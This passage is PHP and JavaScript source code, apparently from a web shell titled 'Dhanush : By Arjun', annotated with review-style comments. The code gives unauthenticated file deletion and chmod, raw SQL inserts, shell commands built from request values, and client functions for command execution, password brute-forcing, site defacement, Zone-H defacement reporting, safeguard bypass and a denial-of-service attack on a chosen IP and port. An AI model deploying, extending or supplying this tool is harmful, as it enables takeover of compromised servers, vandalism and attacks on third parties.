4615 $num = mysql_num_rows( $pResult );
4616
4617 $rowcount = $num;
4618
4619 $pResultLen = mysql_list_fields( $dbname, $tablename );
4620
4621 for( $i = 0; $i < $num; $i++ )
4622 {
4623 $field = mysql_fetch_array( $pResult );
4624 $fieldname = $field["Field"];
4625 $arrdata = $_REQUEST[$fieldname];
4626
 // $str1 accumulates "col," and $str2 accumulates "'value',".
4627 $str1 .= "".$fieldname . ",";
4628 $str2 .= "'".$arrdata . "',";
4629 $rowcount--;
 // Empty branch: both statements inside are commented out.
4630 if($rowcount != 0)
4631 {
4632 //$str1 .= $fieldname . ",";
4633 //$str2 .= $arrdata . ",";
4634 }
4635 }
 // Strip the trailing comma from both lists (eregi_replace() was removed in
 // PHP 7.0).
4636 $str1=eregi_replace(',$', '', $str1);
4637 $str2=eregi_replace(',$', '', $str2);
4638 $str = "INSERT INTO `$tablename` ($str1) VALUES ($str2);";
4639 mysql_query($str);
4640
4641 ?><div id="showsql"></div><?php
4642}
4643else if(isset($_GET['logoutdb']))
4644{
 // Handler for ?logoutdb: rewrites the three database-credential cookies and
 // redirects to $self.
 // NOTE(review): the second argument of setcookie() is the cookie VALUE, so
 // these calls overwrite each cookie with a timestamp string; they do not set
 // an expiry time in the past.
4645 setcookie("dbserver",time() - 60*60);
4646 setcookie("dbuser",time() - 60*60);
4647 setcookie("dbpass",time() - 60*60);
4648 header("Location:$self");
4649}
4650else if(isset($_POST['choice']))
4651{
 // Bulk file-manager handler, selected by the POST field "choice":
 // delete, chmod (show form), changefileperms, compre (archive) or uncompre
 // (extract). Target paths arrive in the POST array "actbox".
 // NOTE(review): every path is taken from the request as-is; no authentication,
 // path restriction or validation is visible in this block.
 // NOTE(review): in each branch the first foreach has no braces, so its body is
 // only the explode() line. After it finishes, $myv holds the comma-split form
 // of the LAST actbox element, and the second foreach walks that list. This
 // matches the client-side myaction() helper, which sends all selected paths
 // as one comma-joined actbox[] value.
4652 if($_POST['choice'] == "delete")
4653 {
4654 $actbox = $_POST["actbox"];
4655
4656 foreach ($actbox as $myv)
4657 $myv = explode(",",$myv);
4658 foreach ($myv as $v)
4659 {
 // Files are removed with unlink(); directories are handed to rrmdir(),
 // which is defined elsewhere in the file.
4660 if(is_file($v))
4661 {
4662 if(unlink($v))
4663 echo "<br><center><font class=txt>File $v Deleted Successfully</font></center>";
4664 else
4665 echo "<br><center>Cannot Delete File $v</center>";
4666 }
4667 else if(is_dir($v))
4668 {
4669 rrmdir($v);
4670 }
4671 }
4672 }
4673 else if($_POST['choice'] == "chmod")
4674 { ?>
4675 <form id="chform"><?php
 // Shows the permission form. The selected paths are echoed unescaped into
 // hidden inputs named actbox3[]; the changefileperms branch reads "actbox".
4676 $actbox1 = $_POST['actbox'];
4677 foreach ($actbox1 as $myv)
4678 $myv = explode(",",$myv);
4679 foreach ($myv as $v)
4680 { ?>
4681 <input type="hidden" name="actbox3[]" id="actbox3[]" value="<?php echo $v; ?>">
4682 <?php }
4683 ?>
4684 <table align="center" border="3" style="width:40%; border-color:#333333;">
4685 <tr>
4686 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
4687 </tr>
4688 <tr>
4689 <td colspan="2" align="center" style="height:60px">
4690 <input type="button" onClick="myaction('changefileperms',chmode.value)" value="Change Permission" class="but" style="padding: 5px;" /></td>
4691 </tr>
4692 </table>
4693
4694 </form> <?php
4695 }
4696 else if($_POST['choice'] == "changefileperms")
4697 {
 // Applies the posted mode string to each selected path.
 // NOTE(review): is_numeric() also accepts strings that are not plain octal
 // digit sequences.
4698 if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
4699 {
4700 $actbox = $_POST["actbox"];
4701 foreach ($actbox as $myv)
4702 $myv = explode(",",$myv);
4703 foreach ($myv as $v)
4704 {
4705 if(is_file($v) || is_dir($v))
4706 {
 // Interpret the mode string as base 8, digit by digit from the right.
4707 $perms = 0;
4708 for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
4709 $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
4710 echo "<div align=left style=width:60%;>";
4711 if(@chmod($v,$perms))
4712 echo "<font class=txt>File $v Permissions Changed Successfully</font><br>";
4713 else
4714 echo "Cannot Change $v File Permissions<br>";
4715 echo "</div>";
4716 }
4717 }
4718
4719 }
4720 }
4721 else if($_POST['choice'] == "compre")
4722 {
4723 $actbox = $_POST["actbox"];
4724 foreach ($actbox as $myv)
4725 $myv = explode(",",$myv);
4726 foreach ($myv as $v)
4727 {
4728 if(is_file($v))
4729 {
 // Creates "<basename>.zip" using a relative name. The error string is
 // single-quoted, so "$v" is printed literally, and addFile()/close()
 // run even when open() failed.
4730 $zip = new ZipArchive();
4731 $filename= basename($v) . '.zip';
4732 if(($zip->open($filename, ZipArchive::CREATE))!==true)
4733 { echo '<br><font size=3>Error: Unable to create zip file for $v</font>';}
4734 else {echo "<br><font class=txt size=3>File $v Compressed successfully</font>";}
4735 $zip->addFile(basename($v));
4736 $zip->close();
4737 }
4738 else if(is_dir($v))
4739 {
4740 if($os == "Linux")
4741 {
 // NOTE(review): the request-supplied path is interpolated into a
 // command string passed to execmd() (defined elsewhere) without
 // escaping. The message reports "$v.tar" while the archive is
 // written as "<basename>.tar".
4742 $filename= basename($v);
4743 execmd("tar --create --recursion --file=$filename.tar $v");
4744 echo "<br><font class=txt size=3>File $v Compressed successfully as $v.tar</font>";
4745 }
4746 }
4747 }
4748 }
4749 else if($_POST['choice'] == "uncompre")
4750 {
4751 $actbox = $_POST["actbox"];
4752 foreach ($actbox as $myv)
4753 $myv = explode(",",$myv);
4754 foreach ($myv as $v)
4755 {
4756 if(is_file($v) || is_dir($v))
4757 {
 // Opens the archive by its base name (relative path) and extracts it
 // into a directory named after the text before the first dot.
4758 $zip = new ZipArchive;
4759 $filename= basename($v);
4760 $res = $zip->open($filename);
4761 if ($res === TRUE)
4762 {
4763 $pieces = explode(".",$filename);
4764 $zip->extractTo($pieces[0]);
4765 $zip->close();
4766 echo "<br><font class=txt size=3>File $v Unzipped successfully</font>";
4767 } else
4768 echo "<br><font size=3>Error: Unable to Unzip file $v</font>";
4769 }
4770 }
4771 }
4772}
4773else if(isset($_GET['sitename']))
4774{
 // Handler for ?sitename=<value>: strips "http://", "http://www." and "www."
 // from the value, appends the rest to "ls -la /etc/valiases/" and passes the
 // string to myexe() (defined elsewhere), echoing whatever comes back.
 // NOTE(review): the request value is concatenated into a command string with
 // no escaping or validation visible here. The second str_replace() can never
 // match, because the first one has already removed every "http://".
4775 $sitename = str_replace("http://","",$_GET['sitename']);
4776 $sitename = str_replace("http://www.","",$sitename);
4777 $sitename = str_replace("www.","",$sitename);
4778 $show = myexe("ls -la /etc/valiases/".$sitename);
4779 if(!empty($show))
4780 echo $show;
4781 else
4782 echo "Cannot get the username";
4783}
4784else if(isset($_GET['mydata']))
4785{
 // ?mydata: calls listdatabase(), defined elsewhere in the file.
4786 listdatabase();
4787}
4788else if(isset($_GET['home']))
4789{
 // ?home=<path>: passes the request value to mainfun(), defined elsewhere.
4790 mainfun($_GET['home']);
4791}
4792else if(isset($_GET['dir']))
4793{
 // ?dir&myfilepath=<path>: the branch is selected by "dir", but the value
 // handed to mainfun() is the separate "myfilepath" parameter.
4794 mainfun($_GET['myfilepath']);
4795}
4796else if(isset($_GET['mydirpath']))
4797{
 // ?mydirpath=<path>: reports whether the request-supplied path is writable
 // by the PHP process, as a short HTML fragment.
4798 echo is_writable($_GET['mydirpath'])?"<font class=txt>< writable ></font>":"< not writable >";
4799}
4800else
4801{
4802?>
4803<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
4804<title>Dhanush : By Arjun</title>
4805<script type="text/javascript">
4806 checked = false;
// `checked` (implicit global) is the select-all state toggled by checkedAll().
// `waitstate` is the placeholder HTML each AJAX helper shows while its request
// is in flight.
4807 var waitstate = "<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
4808 function checkedAll ()
4809 {
 // Flips the global `checked` flag and applies the new state to every element
 // of the form with id "myform" (select all / deselect all).
4810 if (checked == false){checked = true}else{checked = false}
4811 for (var i = 0; i < document.getElementById('myform').elements.length; i++)
4812 {
4813 document.getElementById('myform').elements[i].checked = checked;
4814 }
4815 }
4816 function urlchange(myfilepath)
4817 {
 // Builds breadcrumb HTML for a path and returns it as a string. The path is
 // split on the directory separator that PHP writes into the script via
 // addslashes($directorysperator); each non-empty component becomes a link
 // whose onClick calls changedir('dir', <path up to that component>).
 // When the server-side $os is "Linux" the result starts with a "/" root link.
 // NOTE(review): path components are concatenated into HTML and inline
 // JavaScript without escaping.
4818 var mypath, mpath, i, t, j, r = "",myurl = "",splitter="";
4819 splitter = "<?php echo addslashes($directorysperator); ?>";
4820 mypath = mpath = myfilepath.split(splitter);
4821 <?php if($os == "Linux") { ?>
4822 r = "/";
4823 myurl = "<a href=javascript:void(0) onClick=\"changedir('dir','/')\">/</a>";
4824 <?php } ?>
4825 for (i = 0; i < mypath.length; i++)
4826 {
4827 if(mypath[i] == "")
4828 continue;
 // r accumulates the path prefix ending at the current component.
4829 r += mypath[i]+"<?php echo addslashes($directorysperator); ?>";
4830
4831 myurl += "<a href=javascript:void(0) onClick=\"changedir('dir','"+r+"\')\"><b>"+mypath[i]+"<?php echo addslashes($directorysperator); ?></b></a>";
4832 }
 // Double every backslash in the generated markup.
4833 myurl = myurl.replace(/\\/g,"\\\\");
4834 return myurl;
4835 }
4836 function wrtblDIR(mydirpath)
4837 {
 // Asks the server whether a directory is writable: sends
 // GET <script>?&mydirpath=<path> and copies the response HTML into the first
 // four elements named "wrtble".
 // NOTE(review): the path is not URL-encoded, and the loop counter `i` is an
 // implicit global.
4838 var ajaxRequest;
4839 ajaxRequest = new XMLHttpRequest();
4840
4841 ajaxRequest.onreadystatechange = function()
4842 {
4843 if(ajaxRequest.readyState == 4)
4844 {
4845 for(i=0;i<=3;i++)
4846 document.getElementsByName("wrtble")[i].innerHTML=ajaxRequest.responseText;
4847 }
4848 }
4849
4850 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?&mydirpath="+mydirpath, true);
4851 ajaxRequest.send(null);
4852 }
4853 function setpath(myfilpath)
4854 {
 // Makes `myfilpath` the current directory in the UI: refreshes the writable
 // indicator via wrtblDIR(), copies the path into the form fields with ids
 // path, createfile, createfolder, exepath and auexepath, and clears #showdir.
 // The createfolder assignment appears twice.
4855 wrtblDIR(myfilpath);
4856 document.getElementById("path").value=myfilpath;
4857 document.getElementById("createfile").value=myfilpath;
4858 document.getElementById("createfolder").value=myfilpath;
4859 document.getElementById("createfolder").value=myfilpath;
4860 document.getElementById("exepath").value=myfilpath;
4861 document.getElementById("auexepath").value=myfilpath;
4862 document.getElementById("showdir").innerHTML="";
4863 }
4864 function changedir(myaction,myfilepath)
4865 {
 // Changes the listed directory: sends
 // GET <script>?<myaction>&myfilepath=<path>, shows the wait placeholder in
 // #showmaindata, and on completion calls setpath(), writes the breadcrumb
 // from urlchange() into #crdir and the response HTML into #showmaindata.
 // NOTE(review): parameters are not URL-encoded; the response is inserted via
 // innerHTML.
4866 var myurl = urlchange(myfilepath);
4867
4868 document.getElementById("showmaindata").innerHTML=waitstate;
4869 var ajaxRequest;
4870 ajaxRequest = new XMLHttpRequest();
4871
4872 ajaxRequest.onreadystatechange = function()
4873 {
4874 if(ajaxRequest.readyState == 4)
4875 {
4876 setpath(myfilepath);
4877 document.getElementById("crdir").innerHTML=myurl;
4878 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
4879 }
4880 }
4881
4882 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
4883 ajaxRequest.send(null);
4884 }
4885 function gethome(myaction,mydir)
4886 {
 // Loads a directory listing: sends GET <script>?<myaction>=<mydir>, then
 // writes the response HTML into #showmaindata, updates the path fields via
 // setpath() and the breadcrumb in #crdir.
 // NOTE(review): parameters are not URL-encoded; the response is inserted via
 // innerHTML.
4887 var myurl = urlchange(mydir);
4888 document.getElementById("showmaindata").innerHTML=waitstate;
4889 var ajaxRequest;
4890 ajaxRequest = new XMLHttpRequest();
4891
4892 ajaxRequest.onreadystatechange = function()
4893 {
4894 if(ajaxRequest.readyState == 4)
4895 {
4896 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
4897 setpath(mydir);
4898 document.getElementById("crdir").innerHTML=myurl;
4899 }
4900 }
4901
4902 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+mydir, true);
4903 ajaxRequest.send(null);
4904 }
4905 function getname(sitename)
4906 {
 // Sends GET <script>?sitename=<sitename> and writes the response HTML into
 // #showsite. In this file the ?sitename handler passes the value to a shell
 // listing of /etc/valiases/.
 // NOTE(review): the value is not URL-encoded; the response is inserted via
 // innerHTML.
4907 document.getElementById("showsite").innerHTML=waitstate;
4908 var ajaxRequest;
4909 ajaxRequest = new XMLHttpRequest();
4910
4911 ajaxRequest.onreadystatechange = function()
4912 {
4913 if(ajaxRequest.readyState == 4)
4914 {
4915 document.getElementById("showsite").innerHTML=ajaxRequest.responseText;
4916 }
4917 }
4918
4919 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?sitename="+sitename, true);
4920 ajaxRequest.send(null);
4921 }
4922 function myaction(myfileaction,chmode)
4923 {
 // Submits a bulk file action: gathers the values of the checked checkboxes
 // named "actbox[]" and POSTs choice=<myfileaction>, chmode=<chmode> and a
 // single actbox[] parameter. The response HTML goes into #showdir.
 // `mychoice` is indexed by checkbox position, so it is sparse; string
 // concatenation joins it with commas, which is the format the server-side
 // "choice" handler splits with explode(",").
 // NOTE(review): values are not URL-encoded; the response is inserted via
 // innerHTML.
4924 var mytype = document.getElementsByName('actbox[]');
4925 var mychoice = new Array();
4926
4927 for (var i = 0, length = mytype.length; i < length; i++)
4928 {
4929 if (mytype[i].checked)
4930 mychoice[i] = mytype[i].value;
4931 }
4932
4933 var params = "choice="+myfileaction+"&chmode="+chmode+"&actbox[]="+mychoice;
4934
4935 document.getElementById("showdir").innerHTML=waitstate;
4936 var ajaxRequest;
4937 ajaxRequest = new XMLHttpRequest();
4938
4939 ajaxRequest.onreadystatechange = function()
4940 {
4941 if(ajaxRequest.readyState == 4)
4942 {
4943 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
4944 }
4945 }
4946
4947 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
4948 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
4949 ajaxRequest.send(params);
4950 }
4951 function editdata()
4952 {
 // Variadic helper behind the "Edit Data" and "Insert" buttons. The arguments
 // alternate name, value, name, value...: arguments[0] is the first parameter
 // name, arguments[3] the database name and arguments[5] the table name.
 // It assembles them into a form-encoded body, removes the "dhanush_" prefix
 // from field names, POSTs the body to the script and then reloads the table
 // list with viewtables('listTables', dbname, tablename).
 // NOTE(review): values are not URL-encoded, so "&" or "=" inside a value
 // changes how the body is parsed.
4953 var result = "", // initialize list
4954 i,dbname,tablename;
4955 // iterate through arguments
4956 for (i = 1; i < arguments.length; i++)
4957 {
 // Even positions are parameter names, odd positions are values.
4958 if(i%2 == 0)
4959 result += arguments[i]+'=';
4960 else
4961 result += arguments[i]+'&';
4962 }
 // Drop the trailing "&".
4963 result = result.slice(0, -1);
4964
4965 dbname = arguments[3];
4966 tablename = arguments[5];
4967 var result=result.replace(/dhanush_/g,"");
4968 var params = arguments[0]+"="+result;
4969
4970 document.getElementById("showsql").innerHTML=waitstate;
4971 var ajaxRequest;
4972 ajaxRequest = new XMLHttpRequest();
4973
4974 ajaxRequest.onreadystatechange = function()
4975 {
4976 if(ajaxRequest.readyState == 4)
4977 {
4978 viewtables('listTables',dbname,tablename);
4979 }
4980 }
4981
4982 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
4983 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
4984 ajaxRequest.send(params);
4985 }
4986 function viewtables(action,dbname,tablename,rowid,arrdata,executequery,fieldname,page)
4987 {
 // Generic request helper for the database browser. Sends
 // GET <script>?action=..&dbname=..&tablename=..&<rowid>=<arrdata>
 //     &executemyquery=..&fieldname=..&page=..
 // and writes the response HTML into #showsql.
 // Arguments the caller leaves out are sent as the literal text "undefined".
 // NOTE(review): nothing is URL-encoded, and the free-form SQL text travels in
 // the query string of a GET request; the response is inserted via innerHTML.
4988 document.getElementById("showsql").innerHTML=waitstate;
4989 var ajaxRequest;
4990 ajaxRequest = new XMLHttpRequest();
4991
4992 ajaxRequest.onreadystatechange = function()
4993 {
4994 if(ajaxRequest.readyState == 4)
4995 {
4996 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
4997 }
4998 }
4999
5000 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?action="+action+"&dbname="+dbname+"&tablename="+tablename+"&"+rowid+"="+arrdata+"&executemyquery="+executequery+"&fieldname="+fieldname+"&page="+page, true);
5001 ajaxRequest.send(null);
5002 }
5003 function mydatabase(server,username,password)
5004 {
 // Database login step: sends
 // GET <script>?executeit&server=..&username=..&password=..
 // and, once the request completes, calls mydatago(). The response body is
 // not used.
 // NOTE(review): the database credentials are sent in the URL query string,
 // unencoded.
5005 document.getElementById("showsql").innerHTML=waitstate;
5006 var ajaxRequest;
5007 ajaxRequest = new XMLHttpRequest();
5008
5009 ajaxRequest.onreadystatechange = function()
5010 {
5011 if(ajaxRequest.readyState == 4)
5012 {
5013 mydatago();
5014 }
5015 }
5016
5017 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executeit&server="+server+"&username="+username+"&password="+password, true);
5018 ajaxRequest.send(null);
5019 }
5020 function mydatago()
5021 {
 // Sends GET <script>?mydata (handled server-side by listdatabase()), hides
 // the element with id "datatable" and writes the response HTML into #showsql.
5022 var ajaxRequest;
5023 ajaxRequest = new XMLHttpRequest();
5024
5025 ajaxRequest.onreadystatechange = function()
5026 {
5027 if(ajaxRequest.readyState == 4)
5028 {
5029 document.getElementById("datatable").style.display = 'none';
5030 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
5031 }
5032 }
5033
5034 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydata", true);
5035 ajaxRequest.send(null);
5036 }
5037 function bruteforce(prototype,serverport,login,dict)
5038 {
 // Sends the password-guessing form to the server:
 // GET <script>?prototype=..&serverport=..&login=..&dict=..&type=..&reverse=..
 // and writes the response HTML into #showbrute. The server-side handler is
 // not visible in this part of the file.
 // `type` is the value of the checked radio button named "mytype"; `reverse`
 // is 1 or 0 from the checkbox with id "reverse".
 // NOTE(review): if no "mytype" radio is checked the loop ends with
 // i == length, and mytype[i].value throws. Parameters are not URL-encoded.
5039 var mytype = document.getElementsByName('mytype');
 // The loop only locates the checked radio; `i` is read again below.
5040 for (var i = 0, length = mytype.length; i < length; i++)
5041 {
5042 if (mytype[i].checked)
5043 break;
5044 }
5045 var getreverse = 0;
5046 if(document.getElementById('reverse').checked == true)
5047 getreverse = 1;
5048 else
5049 getreverse = 0;
5050
5051 document.getElementById("showbrute").innerHTML=waitstate;
5052 var ajaxRequest;
5053 ajaxRequest = new XMLHttpRequest();
5054
5055 ajaxRequest.onreadystatechange = function()
5056 {
5057 if(ajaxRequest.readyState == 4)
5058 {
5059 document.getElementById("showbrute").innerHTML=ajaxRequest.responseText;
5060 }
5061 }
5062
5063 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?prototype="+prototype+"&serverport="+serverport+"&login="+login+"&dict="+dict+"&type="+mytype[i].value+"&reverse="+getreverse, true);
5064 ajaxRequest.send(null);
5065 }
5066 function executemyfile(action,executepath,execute)
5067 {
 // Sends GET <script>?<action>&executepath=..&execute=.. and writes the
 // response HTML into #showmaindata. The server-side handler is not visible
 // in this part of the file.
 // NOTE(review): parameters are not URL-encoded; the response is inserted via
 // innerHTML.
5068 document.getElementById("showmaindata").innerHTML=waitstate;
5069 var ajaxRequest;
5070 ajaxRequest = new XMLHttpRequest();
5071
5072 ajaxRequest.onreadystatechange = function()
5073 {
5074 if(ajaxRequest.readyState == 4)
5075 {
5076 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
5077 }
5078 }
5079
5080 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+action+"&executepath="+executepath+"&execute="+execute, true);
5081 ajaxRequest.send(null);
5082 }
5083 function maindata(myaction,dir)
5084 {
 // Loads one of the shell's panels: sends
 // GET <script>?<myaction>=<myaction>&dir=<dir>, writes the response HTML into
 // #showmaindata and clears #showdir.
 // NOTE(review): parameters are not URL-encoded; the response is inserted via
 // innerHTML.
5085 document.getElementById("showmaindata").innerHTML=waitstate;
5086 var ajaxRequest;
5087 ajaxRequest = new XMLHttpRequest();
5088
5089 ajaxRequest.onreadystatechange = function()
5090 {
5091 if(ajaxRequest.readyState == 4)
5092 {
5093 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
5094 document.getElementById("showdir").innerHTML="";
5095 }
5096 }
5097
5098 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+myaction+"&dir="+dir, true);
5099 ajaxRequest.send(null);
5100 }
5101 function manuallyscriptfn(passwd)
5102 {
 // POSTs scriptlocator=scriptlocator&passwd=<passwd> to the script and writes
 // the response HTML into #showdata. The server-side handler is not visible
 // in this part of the file.
 // NOTE(review): `message` holds the URL-encoded value but is never used; the
 // request body carries the raw `passwd`.
5103 var message = encodeURIComponent(passwd);
5104 var params = "scriptlocator=scriptlocator&passwd="+passwd;
5105 document.getElementById("showdata").innerHTML=waitstate;
5106 var ajaxRequest;
5107 ajaxRequest = new XMLHttpRequest();
5108
5109 ajaxRequest.onreadystatechange = function()
5110 {
5111 if(ajaxRequest.readyState == 4)
5112 {
5113 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5114 }
5115 }
5116
5117 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5118 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5119 ajaxRequest.send(params);
5120 }
5121 function my404page(message)
5122 {
 // POSTs 404page=404page&message=<URL-encoded message> to the script and
 // writes the response HTML into #showdata. The server-side handler is not
 // visible in this part of the file.
5123 var message = encodeURIComponent(message);
5124 var params = "404page=404page&message="+message;
5125 document.getElementById("showdata").innerHTML=waitstate;
5126 var ajaxRequest;
5127 ajaxRequest = new XMLHttpRequest();
5128
5129 ajaxRequest.onreadystatechange = function()
5130 {
5131 if(ajaxRequest.readyState == 4)
5132 {
5133 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5134 }
5135 }
5136
5137 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5138 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5139 ajaxRequest.send(params);
5140 }
5141 function executemyfn(executepath,executemycmd)
5142 {
 // Sends GET <script>?executepath=..&executemycmd=.. and writes the response
 // HTML into #showexecute. The server-side handler is not visible in this
 // part of the file.
 // NOTE(review): the command text travels unencoded in the URL query string;
 // the response is inserted via innerHTML.
5143 document.getElementById("showexecute").innerHTML="Wait....";
5144 var ajaxRequest;
5145 ajaxRequest = new XMLHttpRequest();
5146
5147 ajaxRequest.onreadystatechange = function()
5148 {
5149 if(ajaxRequest.readyState == 4)
5150 {
5151 document.getElementById("showexecute").innerHTML=ajaxRequest.responseText;
5152 }
5153 }
5154
5155 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executepath="+executepath+"&executemycmd="+executemycmd, true);
5156 ajaxRequest.send(null);
5157 }
5158 function zoneh(defacer,hackmode,reason,domain)
5159 {
 // POSTs SendNowToZoneH=SendNowToZoneH&defacer=..&hackmode=..&reason=..&domain=..
 // to the script and writes the response HTML into #showzone. The server-side
 // handler is not visible in this part of the file.
 // NOTE(review): only `domain` is URL-encoded; the other three values are sent
 // raw.
5160 var domain = encodeURIComponent(domain);
5161 var params = "SendNowToZoneH=SendNowToZoneH&defacer="+defacer+"&hackmode="+hackmode+"&reason="+reason+"&domain="+domain;
5162 document.getElementById("showzone").innerHTML=waitstate;
5163 var ajaxRequest;
5164 ajaxRequest = new XMLHttpRequest();
5165
5166 ajaxRequest.onreadystatechange = function()
5167 {
5168 if(ajaxRequest.readyState == 4)
5169 {
5170 document.getElementById("showzone").innerHTML=ajaxRequest.responseText;
5171 }
5172 }
5173
5174 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5175 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5176 ajaxRequest.send(params);
5177 }
5178 function savemyfile(file,content)
5179 {
 // POSTs content=<URL-encoded content>&file=<file> to the script and writes
 // the response HTML into #showmydata. The server-side handler is not visible
 // in this part of the file.
 // NOTE(review): the file path is sent without URL-encoding.
5180 var content = encodeURIComponent(content);
5181 var params = "content="+content+"&file="+file;
5182 document.getElementById("showmydata").innerHTML=waitstate;
5183 var ajaxRequest;
5184 ajaxRequest = new XMLHttpRequest();
5185
5186 ajaxRequest.onreadystatechange = function()
5187 {
5188 if(ajaxRequest.readyState == 4)
5189 {
5190 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5191 }
5192 }
5193
5194 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5195 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5196 ajaxRequest.send(params);
5197 }
5198 function renamefun(file,to)
5199 {
 // Sends GET <script>?renamemyfile&file=<file>&to=<to> and writes the response
 // HTML into #showmydata. The server-side handler is not visible in this part
 // of the file.
 // NOTE(review): parameters are not URL-encoded; the response is inserted via
 // innerHTML.
5200 document.getElementById("showmydata").innerHTML=waitstate;
5201 var ajaxRequest;
5202 ajaxRequest = new XMLHttpRequest();
5203
5204 ajaxRequest.onreadystatechange = function()
5205 {
5206 if(ajaxRequest.readyState == 4)
5207 {
5208 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5209 }
5210 }
5211
5212 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?renamemyfile&file="+file+"&to="+to, true);
5213 ajaxRequest.send(null);
5214 }
5215 function changeperms(chmode,myfilename)
5216 {
 // Sends GET <script>?chmode=<chmode>&myfilename=<myfilename> and writes the
 // response HTML into #showmydata. The server-side handler is not visible in
 // this part of the file.
 // NOTE(review): parameters are not URL-encoded; the response is inserted via
 // innerHTML.
5217 document.getElementById("showmydata").innerHTML=waitstate;
5218 var ajaxRequest;
5219 ajaxRequest = new XMLHttpRequest();
5220
5221 ajaxRequest.onreadystatechange = function()
5222 {
5223 if(ajaxRequest.readyState == 4)
5224 {
5225 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5226 }
5227 }
5228
5229 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?chmode="+chmode+"&myfilename="+myfilename, true);
5230 ajaxRequest.send(null);
5231 }
5232 function defacefun(deface)
5233 {
 // Sends GET <script>?deface=<deface> and shows the response text in an
 // alert() box. The server-side handler is not visible in this part of the
 // file.
 // NOTE(review): the value is not URL-encoded.
5234 var ajaxRequest;
5235 ajaxRequest = new XMLHttpRequest();
5236
5237 ajaxRequest.onreadystatechange = function()
5238 {
5239 if(ajaxRequest.readyState == 4)
5240 {
5241 alert(ajaxRequest.responseText);
5242 }
5243 }
5244
5245 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?deface="+deface, true);
5246 ajaxRequest.send(null);
5247 }
5248 function fileaction(myaction,myfilepath)
5249 {
 // Per-file action helper: sends GET <script>?<myaction>&myfilepath=<path>
 // and writes the response HTML into #showmydata. Which actions exist is
 // decided server-side and is not visible in this part of the file.
 // NOTE(review): parameters are not URL-encoded; the response is inserted via
 // innerHTML.
5250 document.getElementById("showmydata").innerHTML=waitstate;
5251 var ajaxRequest;
5252 ajaxRequest = new XMLHttpRequest();
5253
5254 ajaxRequest.onreadystatechange = function()
5255 {
5256 if(ajaxRequest.readyState == 4)
5257 {
5258 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5259 }
5260 }
5261
5262 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
5263 ajaxRequest.send(null);
5264 }
5265 function bypassfun(funct,functvalue,optiontype)
5266 {
 // Sends GET <script>?bypassit&<funct>=<functvalue>&optiontype=<optiontype>
 // and writes the response HTML into #showbyp. The parameter NAME is supplied
 // by the caller; the server-side handler is not visible in this part of the
 // file.
 // NOTE(review): parameters are not URL-encoded; the response is inserted via
 // innerHTML.
5267 document.getElementById("showbyp").innerHTML=waitstate;
5268 var ajaxRequest;
5269 ajaxRequest = new XMLHttpRequest();
5270
5271 ajaxRequest.onreadystatechange = function()
5272 {
5273 if(ajaxRequest.readyState == 4)
5274 {
5275 document.getElementById("showbyp").innerHTML=ajaxRequest.responseText;
5276 }
5277 }
5278
5279 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?bypassit&"+funct+"="+functvalue+"&optiontype="+optiontype, true);
5280 ajaxRequest.send(null);
5281 }
5282 function dos(target,ip,port,timeout,exTime,no0fBytes,multiplier)
5283 {
 // Sends GET <script>?<target>&ip=..&port=..&timeout=..&exTime=..
 //     &multiplier=..&no0fBytes=..
 // and writes the response HTML into #showdos. The server-side handler is not
 // visible in this part of the file.
